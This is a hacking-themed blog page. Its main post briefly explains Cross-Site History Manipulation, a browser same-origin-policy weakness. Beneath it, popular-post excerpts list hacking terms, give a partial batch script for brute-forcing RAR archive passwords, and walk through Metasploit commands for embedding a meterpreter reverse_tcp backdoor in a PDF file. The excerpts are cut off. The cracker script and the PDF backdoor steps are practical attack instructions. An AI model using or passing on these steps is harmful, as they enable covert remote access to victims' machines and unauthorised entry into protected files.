💢 Cross Site History Manipulation (XSHM)

-
💢 Cross Site History Manipulation (XSHM)

Ⓜ️Cross-Site History Manipulation (XSHM) isa SOP (SameOrigin Policy) securitybreach.SOP is the most important security concept of modern browsers.SOP means that web pages from different origins by design cannot communicate with each other. Cross-SiteHistory Manipulation breach is based on the fact that client-side browser history object is not properly partitioned on a per-site basis.Manipulating browser history may lead to SOP compromising,allow bi-directional CSRF and other exploitations such as:user privacy violation,login status detection,resources mapping,sensitive information inferring,users’ activity tracking and URL parameter stealing.Ⓜ️

🔳 REQUEST YOUR ANY COURSE FOR FREE.

Popular posts from this blog

⚠️List of terms used in the field of hacking.⚠️

-
Image
🚩Adware − Adware is software designed to force pre-chosen ads to display on your system. 🚩Attack − An attack is an action that is done on a system to get its access and extract sensitive data. 🚩Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections. 🚩Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate. 🚩Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks. 🚩Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combinatio...
Read more

how to crack password of Rar File.

-
Image
__Step 1: Open Notepad__ Open your Notepad Start » Run » Type ”Notepad” » Enter Step 2: Create Batch File Copy The Following code in notepad. REM ============================================================ REM www.devkhilar.tech @echo off title Rar Password Cracker mode con: cols=47 lines=20 copy “C:\Program Files\WinRAR\Unrar.exe” SET PSWD=0 SET DEST=%TEMP%\%RANDOM% MD %DEST% :RAR cls echo ———————————————- echo GET DETAIL echo ———————————————- echo. SET/P “NAME=Enter File Name : ” IF “%NAME%”==”” goto NERROR goto GPATH :NERROR echo ———————————————- echo ERROR echo ———————————————- echo Sorry you can’t leave it blank. pause goto RAR :GPATH SET/P “PATH=Enter Full Path : ” IF “%PATH%”==”” goto PERROR goto NEXT :PERROR echo ———————————————- echo ERROR echo ———————————————- echo Sorry you can’t leave it blank. pause goto RAR :NEXT IF EXIST “%PATH%\%NAME%” GOTO START goto PATH :PATH cls echo ———————————————- echo ...
Read more

🔥How to Embed a backdoor in a PDF file❓

-
Image
🔥How to Embed a backdoor in a PDF file❓ Step 1)Run Metasploit Step2) Find the Appropriate Exploit. I will search metasploits database for an exploit for adobe pdf on windows, using this command: ●Code:msf > search type:exploit platform:windows adobe pdf You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use: ●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Step 3) Set the Payload I will use the meterpreter payload again, because it is one of the most powerful payloads available to us: ●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp Step 4) Set the exploit options First, display the required options for the exploit: ●Code:msf > exploit (adobe_pdf_embedded_exe) > show options You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample...
Read more